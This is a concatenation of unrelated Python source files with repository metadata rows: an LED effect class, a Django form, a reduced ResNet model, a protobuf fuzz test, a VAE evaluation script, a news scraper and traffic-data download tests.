gIndex = listGlyphsSelected[0]
run(gIndex)
else:
run(gIndex)
| 34.033175 | 125 | 0.694402 | 2,077 | 14,362 | 4.715455 | 0.181993 | 0.028589 | 0.041352 | 0.040025 | 0.418215 | 0.369512 | 0.35726 | 0.324382 | 0.317031 | 0.261793 | 0 | 0.046838 | 0.171982 | 14,362 | 421 | 126 | 34.114014 | 0.776741 | 0.050272 | 0 | 0.325648 | 0 | 0 | 0.163009 | 0.00367 | 0 | 0 | 0 | 0 | 0 | 1 | 0.118156 | false | 0 | 0 | 0.005764 | 0.132565 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a40884f8e3655b3dfc6d99906ed6b026d45047f | 661 | py | Python | Objects/Repeater.py | Camaendir/JB-LED | c6dba7264af3f6f9bc3b312d8afa24e2edebec5b | [
"MIT"
] | 3 | 2020-07-29T10:40:02.000Z | 2021-01-02T15:18:00.000Z | Objects/Repeater.py | Camaendir/JB-LED | c6dba7264af3f6f9bc3b312d8afa24e2edebec5b | [
"MIT"
] | 5 | 2020-10-01T18:28:39.000Z | 2020-10-08T19:17:44.000Z | Objects/Repeater.py | Camaendir/JB-LED | c6dba7264af3f6f9bc3b312d8afa24e2edebec5b | [
"MIT"
] | null | null | null | import copy
from math import floor
from Objects.Object import Object
class Repeater(Object):
def __init__(self, isVisible, position, content, pixellength, numRepeats=-1, spacing=0):
super().__init__(isVisible, position, content)
self.numRepeats = numRepeats
self.spacing = spacing
self.pixellength = pixellength
def getContent(self):
max_reps = floor(self.pixellength / (len(self.content) + self.spacing))
reps = max_reps if self.numRepeats == -1 else min(self.numRepeats, max_reps)
full = copy.deepcopy(self.content)
full.extend([[-1,-1,-1]]*self.spacing)
return full * reps
| 31.47619 | 92 | 0.67171 | 80 | 661 | 5.4125 | 0.4 | 0.096998 | 0.110855 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011605 | 0.217852 | 661 | 20 | 93 | 33.05 | 0.825919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.2 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a41f91574cc97294c624d878bae98006410b2d3 | 627 | py | Python | web/django/bookLib/bookLib/forms.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | web/django/bookLib/bookLib/forms.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | web/django/bookLib/bookLib/forms.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | from django import forms
class SearchForm(forms.Form):
CHOICES = [
(u'ISBN', u'ISBN'),
(u'书名', u'书名'),
(u'作者', u'作者')
]
search_by = forms.ChoiceField(
label='',
choices=CHOICES,
widget=forms.RadioSelect(),
initial=u'书名',
)
keyword = forms.CharField(
label='',
max_length=32,
widget=forms.TextInput(attrs={
'class': 'form-control input-lg',
'placeholder': u'请输入需要检索的图书信息',
'name': 'keyword',
})
) | 24.115385 | 49 | 0.432217 | 55 | 627 | 4.890909 | 0.581818 | 0.033457 | 0.04461 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005602 | 0.430622 | 627 | 26 | 50 | 24.115385 | 0.747899 | 0 | 0 | 0.090909 | 0 | 0 | 0.124204 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a424da371a77f49cafcf1b25908551d82fcf1e6 | 7,173 | py | Python | simpleview_pytorch/resnet.py | isaaccorley/simpleview-pytorch | 84a3e493905491feaed849a8bd5ddd240b2d04f2 | [
"MIT"
] | 9 | 2021-04-27T01:15:13.000Z | 2022-02-01T11:22:35.000Z | simpleview_pytorch/resnet.py | IsaacCorley/simpleview-pytorch | 84a3e493905491feaed849a8bd5ddd240b2d04f2 | [
"MIT"
] | 1 | 2021-05-18T12:24:04.000Z | 2021-06-12T05:09:27.000Z | simpleview_pytorch/resnet.py | IsaacCorley/simpleview-pytorch | 84a3e493905491feaed849a8bd5ddd240b2d04f2 | [
"MIT"
] | 1 | 2022-02-01T11:22:36.000Z | 2022-02-01T11:22:36.000Z | """
Modified from https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py
Edits:
ResNet:
- Changed input layer from 3 channel -> 1 channel (depth images)
- Divided inplanes, planes, and width_per_group by 4
BasicBlock:
- Commented out ValueError triggered by base_width != 64
'To make the number of parameters comparable to point-based methods,
we use ResNet18 with one-fourth filters (ResNet18/4) as the backbone.'
"""
from typing import Type, Any, Callable, Union, List, Optional
import torch
import torch.nn as nn
from torchvision.models.resnet import (
Bottleneck,
conv3x3,
conv1x1
)
class BasicBlock(nn.Module):
expansion: int = 1
def __init__(
self,
inplanes: int,
planes: int,
stride: int = 1,
downsample: Optional[nn.Module] = None,
groups: int = 1,
base_width: int = 64,
dilation: int = 1,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super().__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
"""
if groups != 1 or base_width != 64:
raise ValueError('BasicBlock only supports groups=1 and base_width=64')
"""
if dilation > 1:
raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm_layer(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x: torch.Tensor) -> torch.Tensor:
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet_4(nn.Module):
def __init__(
self,
block: Type[Union[BasicBlock, Bottleneck]],
layers: List[int],
num_classes: int = 1000,
zero_init_residual: bool = False,
groups: int = 1,
width_per_group: int = 64//4,
replace_stride_with_dilation: Optional[List[bool]] = None,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super().__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64//4
self.dilation = 1
if replace_stride_with_dilation is None:
# each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
self.conv1 = nn.Conv2d(1, self.inplanes, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64//4, layers[0])
self.layer2 = self._make_layer(block, 128//4, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256//4, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512//4, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(512//4 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0) # type: ignore[arg-type]
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0) # type: ignore[arg-type]
def _make_layer(self, block: Type[Union[BasicBlock, Bottleneck]], planes: int, blocks: int,
stride: int = 1, dilate: bool = False) -> nn.Sequential:
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def _forward_impl(self, x: torch.Tensor) -> torch.Tensor:
# See note [TorchScript super()]
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.fc(x)
return x
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self._forward_impl(x)
def resnet18_4() -> ResNet_4:
"""
ResNet18/4: ResNet18 with 1/4 the filters
Note: contains ~0.83M params which is close to the 0.8M params reported in paper
"""
return ResNet_4(block=BasicBlock, layers=[2, 2, 2, 2])
| 37.554974 | 107 | 0.577304 | 873 | 7,173 | 4.61512 | 0.239404 | 0.037975 | 0.037975 | 0.055845 | 0.198809 | 0.174981 | 0.120129 | 0.077439 | 0.04418 | 0.04418 | 0 | 0.033505 | 0.321762 | 7,173 | 190 | 108 | 37.752632 | 0.794656 | 0.149868 | 0 | 0.177778 | 0 | 0 | 0.021466 | 0.004887 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051852 | false | 0 | 0.02963 | 0.007407 | 0.140741 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a43a46c11649f880078bee3e46cde206645701e | 641 | py | Python | contrib/libprotobuf_mutator/atheris_libprotobuf_mutator/proto_fuzz_test.py | muzmu/atheris | 7339163c634367dada8e5bca5bcceab8ada2b312 | [
"Apache-2.0"
] | null | null | null | contrib/libprotobuf_mutator/atheris_libprotobuf_mutator/proto_fuzz_test.py | muzmu/atheris | 7339163c634367dada8e5bca5bcceab8ada2b312 | [
"Apache-2.0"
] | null | null | null | contrib/libprotobuf_mutator/atheris_libprotobuf_mutator/proto_fuzz_test.py | muzmu/atheris | 7339163c634367dada8e5bca5bcceab8ada2b312 | [
"Apache-2.0"
] | null | null | null | import unittest
import atheris
import atheris_libprotobuf_mutator
from atheris import fuzz_test_lib
from google.protobuf import wrappers_pb2
@atheris.instrument_func
def simple_proto_comparison(msg):
if msg.value == "abc":
raise RuntimeError("Solved")
class AtherisLibprotobufMutatorTests(unittest.TestCase):
def testSimpleProtoComparison(self):
fuzz_test_lib.run_fuzztest(
simple_proto_comparison,
custom_setup=atheris_libprotobuf_mutator.Setup,
setup_kwargs={"proto": wrappers_pb2.StringValue},
expected_output=b"Solved",
timeout=60)
if __name__ == "__main__":
unittest.main()
| 22.892857 | 57 | 0.762871 | 73 | 641 | 6.328767 | 0.60274 | 0.056277 | 0.108225 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007407 | 0.157566 | 641 | 27 | 58 | 23.740741 | 0.848148 | 0 | 0 | 0 | 0 | 0 | 0.043682 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.263158 | 0 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a43e33d04e3f0eaf830b974bf544c32498255dc | 13,028 | py | Python | notebooks/generative.py | jacobdeasy/geometric-js | c4fd9d17672ac1aef2a95daeb7514ce7c20a469a | [
"MIT"
] | 14 | 2020-06-18T14:14:10.000Z | 2021-08-18T01:59:48.000Z | notebooks/generative.py | jacobdeasy/geometric-js | c4fd9d17672ac1aef2a95daeb7514ce7c20a469a | [
"MIT"
] | null | null | null | notebooks/generative.py | jacobdeasy/geometric-js | c4fd9d17672ac1aef2a95daeb7514ce7c20a469a | [
"MIT"
] | 2 | 2021-03-23T23:43:36.000Z | 2021-05-04T08:35:36.000Z | import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import os
import pdb
from tqdm import tqdm
import argparse
import pandas as pd
import sys
BASE_DIR=os.path.dirname(os.getcwd())
sys.path.append(BASE_DIR)
sys.path.append('/home/tam63/geometric-js')
import torch
import scipy.stats
from scipy.stats import norm
from scipy.special import logsumexp
from vae.utils.modelIO import save_model, load_model, load_metadata
from notebooks.utils import PlotParams
# from utils.helpers import (create_safe_directory, get_device, set_seed,
# get_n_param)
TRAIN_MODELS_DIR = "/home/tam63/results/alpha-experiments"
DATA_DIR = "/home/tam63/geometric-js/data"
SAVE_DIR = "/home/tam63/figures/alpha-experiments"
def parse_arguments(args_to_parse):
"""Parse the command line arguments.
Parameters
----------
args_to_parse: list of str
Arguments to parse (splitted on whitespaces).
"""
description = "PyTorch implementation and evaluation of Variational" + \
"AutoEncoders and metrics."
parser = argparse.ArgumentParser(description=description)
# General options
general = parser.add_argument_group('General options')
general.add_argument('--dataset', type=str, choices=['mnist', 'fashion', 'dsprites'],
help="Name of the dataset being plotted.")
general.add_argument('--divergence', type=str, choices=['dGJS', 'GJS', 'both'],
help="Type of geometric-JS divergence to be plotted on comparison plot.")
general.add_argument('--model-loc', type=str,
help="Location of the trained models to be used to generate plots.")
args = parser.parse_args(args_to_parse)
print(args)
return args
def bootstrap(x, low, high, n_samples):
mu = x.mean()
n = len(x)
X = np.random.choice(x, size=n_samples*n).reshape(n_samples, n)
mu_star = X.mean(axis=1)
d_star = np.sort(mu_star - mu)
return mu, mu + d_star[int(low*n_samples)], mu + d_star[int(high*n_samples)]
def compute_samples(model, data, num_samples, debug=False):
"""
Description
---------------------------------------------------------------
Sample from importance distribution z_samples ~ q(z|X) and
compute p(z_samples), q(z_samples) for importance sampling
Inputs
---------------------------------------------------------------
model : pytorch nn.Module
VAE model implemented in pytroch which has been
trained on the training data corresponding to the
passed test data, which is contained in the variable
'data'.
data : pytorch Tensor
Tensor of shape [batch_size, 1, im_size, im_size],
where im_size is the dimension size of the images used
to train the model, and batch size is the number of
data instances passed, which is therefore also the
number of estimates of the probability distribution
which will be produced.
num_samples : int
For each passed data instance, the probability
distribution p(x|z) will be estimated using a monte
carlo integration with num_samples samples.
returns
---------------------------------------------------------------
z_samples, pz, qz : numpy array
Returns arrays containing the representation of each
passed input image in latent space in z_samples, and the
probabilty distributions qz and pz which are defined by
samples drawn from the normal distribution defined by the
latent space (qz) and defined by the latent space
"""
data = data.cuda()
z_mean, z_log_sigma = model.encoder(data)
z_mean = z_mean.cpu().detach().numpy()
z_log_sigma = z_log_sigma.cpu().detach().numpy()
z_samples = []
qz = []
for m, s in zip(z_mean, z_log_sigma):
# len(s) = len(s) = 10 = size of the latent space dimension
#
# z_vals is num_samples (= 128) samples drawn from the normal
# distribution defined by the mean and std (m[i], s[i])
#
# qz_vals is the normal distribution defined by the samples
# in the vector z_vals
z_vals = [np.random.normal(m[i], np.exp(s[i]), num_samples) for i in range(len(m))]
qz_vals = [norm.pdf(z_vals[i], loc=m[i], scale=np.exp(s[i])) for i in range(len(m))]
z_samples.append(z_vals)
qz.append(qz_vals)
z_samples = np.array(z_samples)
pz = norm.pdf(z_samples)
qz = np.array(qz)
# pdb.set_trace()
# Check why the axes are being swapped
z_samples = np.swapaxes(z_samples, 1, 2)
pz = np.swapaxes(pz, 1, 2)
qz = np.swapaxes(qz, 1, 2)
return z_samples, pz, qz
def estimate_logpx_batch(model, data, num_samples, debug=False, digit_size=32):
"""
"""
z_samples, pz, qz = compute_samples(model, data, num_samples)
assert len(z_samples) == len(data)
assert len(z_samples) == len(pz)
assert len(z_samples) == len(qz)
z_samples = torch.tensor(z_samples).float().cuda()
result = []
for i in range(len(data)):
x_predict = model.decoder(z_samples[i]).reshape(-1, digit_size ** 2)
x_predict = x_predict.cpu().detach().numpy()
x_predict = np.clip(x_predict, np.finfo(float).eps, 1. - np.finfo(float).eps)
p_vals = pz[i]
q_vals = qz[i]
# pdb.set_trace()
datum = data[i].cpu().reshape(digit_size ** 2).numpy() #.reshape(digit_size ** 2)
# \log p(x|z) = Binary cross entropy
logp_xz = np.sum(datum * np.log(x_predict + 1e-9) + (1. - datum) * np.log(1.0 - x_predict + 1e-9), axis=-1)
logpz = np.sum(np.log(p_vals + 1e-9), axis=-1)
logqz = np.sum(np.log(q_vals + 1e-9), axis=-1)
argsum = logp_xz + logpz - logqz
logpx = -np.log(num_samples + 1e-9) + logsumexp(argsum)
result.append(logpx)
return np.array(result)
def estimate_logpx(model, data, num_samples, verbosity=0, digit_size=32):
batches = []
iterations = int(np.ceil(1. * len(data) / 100))
for b in tqdm(range(iterations)):
batch_data = data[b * 100:(b + 1) * 100]
batches.append(estimate_logpx_batch(model, batch_data, num_samples, digit_size=digit_size))
if verbosity and b % max(11 - verbosity, 1) == 0:
print("Batch %d [%d, %d): %.2f" % (b, b * 100, (b+1) * 100, np.mean(np.concatenate(batches))))
log_probs = np.concatenate(batches)
mu, lb, ub = bootstrap(log_probs, 0.025, 0.975, 1000)
return mu, lb, ub
def main(args):
device = 'cuda'
plotter = PlotParams()
plotter.set_params()
DATA_DIR = os.path.join(os.pardir, 'data')
FIG_DIR = os.path.join(os.pardir, 'figs')
RES_DIR = os.path.join(os.pardir, 'results')
# 1) select dataset to load:
if args.dataset == 'dsprites':
X_test = np.load(os.path.join(DATA_DIR, 'dsprites', 'dsprite_train.npz'))['imgs']
X_test = torch.tensor(X_test).unsqueeze(1).float() / 255.0
digit_size = 64
X_test = X_test[:10000]
X_test = X_test.to(device)
elif args.dataset == 'fashion':
X_test = torch.load(os.path.join(DATA_DIR, 'fashionMnist', 'FashionMNIST', 'processed', 'test.pt'))
digit_size = 32
X_test = X_test[0].unsqueeze(1).float() / 255.0
X_test = torch.nn.functional.pad(X_test, pad=(2, 2, 2, 2))
X_test = X_test[:10000]
X_test = X_test.to(device)
elif args.dataset == 'mnist':
X_test = torch.load(os.path.join(DATA_DIR, 'mnist', 'MNIST', 'processed', 'test.pt'))
digit_size = 32
X_test = X_test[0].unsqueeze(1).float() / 255.0
X_test = torch.nn.functional.pad(X_test, pad=(2, 2, 2, 2))
X_test = X_test[:10000]
X_test = X_test.to(device)
# 2) Get the trained alpha dGJS probabilities:
av_a = []
log_probs_lb = []
log_probs_ub = []
log_probs_mu = []
log_probs_best = -np.inf
if args.divergence in ['GJS', 'dGJS']:
divergence = args.divergence
for initial_a in [i/10 for i in range(11)]:
model_path = f"{TRAIN_MODELS_DIR}/{args.dataset}/{args.model_loc}/{divergence}-A_0={initial_a}"
model = load_model(model_path)
logpx_mu, logpx_lb, logpx_ub = estimate_logpx(model, X_test, num_samples=128, verbosity=0, digit_size=digit_size)
log_probs_mu += [logpx_mu]
log_probs_lb += [logpx_lb]
log_probs_ub += [logpx_ub]
if logpx_mu > log_probs_best:
model_best = model_path
log_probs_best = logpx_mu
# break
print(model_path)
print("log p(x) = %.2f (%.2f, %.2f)" % (logpx_mu, logpx_lb, logpx_ub))
# 3) Get the comparison divergences probabilities:
av_a_i = []
log_probs_lb_i = []
log_probs_ub_i = []
log_probs_mu_i = []
log_probs_best_i = -np.inf
model_names = []
# KL:
model_path = f"{TRAIN_MODELS_DIR}/{args.dataset}/{args.model_loc}/KL"
model = load_model(model_path)
logpx_mu, logpx_lb, logpx_ub = estimate_logpx(model, X_test, num_samples=128, verbosity=0, digit_size=digit_size)
log_probs_mu_i += [logpx_mu]
log_probs_lb_i += [logpx_lb]
log_probs_ub_i += [logpx_ub]
model_names.append("KL")
# break
print(model_path)
print("log p(x) = %.2f (%.2f, %.2f)" % (logpx_mu, logpx_lb, logpx_ub))
# fwdKL:
model_path = f"{TRAIN_MODELS_DIR}/{args.dataset}/{args.model_loc}/fwdKL"
model = load_model(model_path)
logpx_mu, logpx_lb, logpx_ub = estimate_logpx(model, X_test, num_samples=128, verbosity=0, digit_size=digit_size)
log_probs_mu_i += [logpx_mu]
log_probs_lb_i += [logpx_lb]
log_probs_ub_i += [logpx_ub]
model_names.append("fwdKL")
# break
print(model_path)
print("log p(x) = %.2f (%.2f, %.2f)" % (logpx_mu, logpx_lb, logpx_ub))
# MMD:
model_path = f"{TRAIN_MODELS_DIR}/{args.dataset}/{args.model_loc}/MMD"
model = load_model(model_path)
logpx_mu, logpx_lb, logpx_ub = estimate_logpx(model, X_test, num_samples=128, verbosity=0, digit_size=digit_size)
log_probs_mu_i += [logpx_mu]
log_probs_lb_i += [logpx_lb]
log_probs_ub_i += [logpx_ub]
model_names.append("MMD")
# break
print(model_path)
print("log p(x) = %.2f (%.2f, %.2f)" % (logpx_mu, logpx_lb, logpx_ub))
# no-constraint:
# model_path = f"{TRAIN_MODELS_DIR}/{args.dataset}/{args.model_loc}/no-constraint"
# model = load_model(model_path)
# logpx_mu, logpx_lb, logpx_ub = estimate_logpx(model, X_test, num_samples=128, verbosity=0, digit_size=digit_size)
# log_probs_mu_i += [logpx_mu]
# log_probs_lb_i += [logpx_lb]
# log_probs_ub_i += [logpx_ub]
# model_names.append("no-constraint")
# print(model_path)
# print("log p(x) = %.2f (%.2f, %.2f)" % (logpx_mu, logpx_lb, logpx_ub))
# 4) Plot:
fig = plt.figure(figsize=(10, 10))
yerr_bar = np.array(log_probs_ub) - np.array(log_probs_lb)
yerr_bar_i = np.array(log_probs_ub_i) - np.array(log_probs_lb_i)
initial_a = [i/10 for i in range(11)]
plt.errorbar(initial_a, log_probs_mu, yerr=yerr_bar, label=args.divergence)
for i in range(len(model_names)):
plt.errorbar(initial_a, [log_probs_mu_i[i]] * len(initial_a), yerr=[yerr_bar_i[i]] * len(initial_a), label=model_names[i])
plt.xlabel(r'Initial $\alpha$')
plt.ylabel(r'$\log(p_{\theta}(X))$')
plt.legend()
plt.title("Log model evidence vs initial alpha")
plt.savefig(f"{SAVE_DIR}/{args.dataset}/{args.divergence}/{args.divergence}-generative-performance.pdf")
plt.savefig(f"{SAVE_DIR}/{args.dataset}/{args.divergence}/{args.divergence}-generative-performance.png", dpi=200)
# save tight layout version:
fig = plt.figure(figsize=(10, 10))
yerr_bar = np.array(log_probs_ub) - np.array(log_probs_lb)
yerr_bar_i = np.array(log_probs_ub_i) - np.array(log_probs_lb_i)
initial_a = [i/10 for i in range(11)]
plt.errorbar(initial_a, log_probs_mu, yerr=yerr_bar, label=args.divergence)
for i in range(len(model_names)):
plt.errorbar(initial_a, [log_probs_mu_i[i]] * len(initial_a), yerr=[yerr_bar_i[i]] * len(initial_a), label=model_names[i])
plt.xlabel(r'Initial $\alpha$')
plt.ylabel(r'$\log(p_{\theta}(X))$')
plt.legend()
plt.tight_layout(pad=1.0, w_pad=1.0, h_pad=1.0)
plt.savefig(f"{SAVE_DIR}/{args.dataset}/{args.divergence}/{args.divergence}-generative-performance-tight-layout.pdf")
plt.savefig(f"{SAVE_DIR}/{args.dataset}/{args.divergence}/{args.divergence}-generative-performance-tight-layout.png", dpi=200)
if __name__ == '__main__':
args = parse_arguments(sys.argv[1:])
main(args) | 35.595628 | 130 | 0.623043 | 1,914 | 13,028 | 4.020899 | 0.173981 | 0.040541 | 0.014293 | 0.018191 | 0.436071 | 0.406055 | 0.373311 | 0.371232 | 0.371232 | 0.350442 | 0 | 0.02011 | 0.232806 | 13,028 | 366 | 131 | 35.595628 | 0.749875 | 0.209856 | 0 | 0.283582 | 0 | 0.00995 | 0.147047 | 0.079249 | 0 | 0 | 0 | 0 | 0.014925 | 1 | 0.029851 | false | 0 | 0.074627 | 0 | 0.129353 | 0.049751 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a467cffc666f7d4209f357092ce125a04accdd5 | 1,234 | py | Python | News_chat_bot/News_scraper.py | amansharmma/News_Chat_Bot | f3342da9f20c5ff9037111a358b4e70c294a6a5b | [
"MIT"
] | null | null | null | News_chat_bot/News_scraper.py | amansharmma/News_Chat_Bot | f3342da9f20c5ff9037111a358b4e70c294a6a5b | [
"MIT"
] | null | null | null | News_chat_bot/News_scraper.py | amansharmma/News_Chat_Bot | f3342da9f20c5ff9037111a358b4e70c294a6a5b | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
import requests,datetime
top_news = {"world":[],"business":[],"technology":[],"sports":[],"entertainment":[]}
def Scraper_news():
new_dic = {}
URLS_of_menu = {"world":"http://www.newzcone.com/world/","business":"http://www.newzcone.com/business/","technology":"http://www.newzcone.com/technology/networking-telecom/","sports":"http://www.newzcone.com/sports/","entertainment":"http://www.newzcone.com/entertainment/"}
Today = datetime.date.today()
today = ""
for string in str(Today):
if string == "-":
today +="/"
else:
today+=string
for key in URLS_of_menu:
url = URLS_of_menu[key]
html = requests.get(url)
soup = BeautifulSoup(html.text,"html.parser")
findingUrl = soup.findAll("div",class_="news-entry")
for div in findingUrl:
a_tags = div.findAll("a")
count = 0
for a in a_tags[1:15]:
new_dic["Date"] = today
new_dic["Discription"] = a.get_text().strip()
new_dic["News_URL"] = a["href"]
html = requests.get(a["href"])
needsoup = BeautifulSoup(html.text,"html.parser")
get_title = needsoup.title.get_text().strip()
new_dic["Title"] = get_title
count +=1
if count == 5:
break
top_news[key].append(new_dic.copy())
return(top_news)
| 33.351351 | 275 | 0.670178 | 172 | 1,234 | 4.668605 | 0.360465 | 0.044832 | 0.0934 | 0.11208 | 0.122042 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006554 | 0.134522 | 1,234 | 36 | 276 | 34.277778 | 0.745318 | 0 | 0 | 0 | 0 | 0 | 0.278994 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029412 | false | 0 | 0.058824 | 0 | 0.088235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a46d0a115b32d7ff6c6db2d71f59e05c37b173c | 2,388 | py | Python | telraam_data/tests/test_download.py | Duam/telraam-data | fd1bda4a0be3f858015470a6cb9a3d64e140ce32 | [
"MIT"
] | null | null | null | telraam_data/tests/test_download.py | Duam/telraam-data | fd1bda4a0be3f858015470a6cb9a3d64e140ce32 | [
"MIT"
] | null | null | null | telraam_data/tests/test_download.py | Duam/telraam-data | fd1bda4a0be3f858015470a6cb9a3d64e140ce32 | [
"MIT"
] | null | null | null | import telraam_data.query as query
import telraam_data.download as download
from .utils import get_data_keys
import datetime as dt
import shutil
import pandas as pd
import pathlib as pl
import random
import pytest
@pytest.fixture()
def one_segment():
all_segments = query.query_active_segments()
segment_idx = random.randrange(1, len(all_segments)) - 1
return all_segments["features"][segment_idx]
@pytest.fixture()
def tmp_path():
path = pl.Path('./tmp/data.csv')
yield path
shutil.rmtree('./tmp/')
def test_list_segments():
# As of April 2020 there were more than 900 active segments.
segments = download.list_segments()
assert len(segments) > 900
def test_list_segments_by_coordinates():
# As of April 2020 there are more than 30 active segments in Schaarbeek
segments = download.list_segments_by_coordinates(lon=4.373, lat=50.867, radius=2)
assert len(segments) > 30
# 1003073114 should be one of them
assert 1003073114 in segments
# 1003063473 should not be one of them
assert 1003063473 not in segments
def test_download_one_segment(one_segment, tmp_path):
segment_id = one_segment["properties"]["segment_id"]
segment_last_time = one_segment["properties"]["last_data_package"]
# Query that segment for the last live day
end_date = dt.datetime.fromisoformat(segment_last_time).date()
start_date = end_date - dt.timedelta(days=1)
df = download.download_one_segment(
segment_id=segment_id,
start_date=start_date,
end_date=end_date,
out_filepath=tmp_path)
required_keys = get_data_keys()
required_keys.remove('date') # 'date' has become the index
# 1. Check returned data
assert len(df) > 0
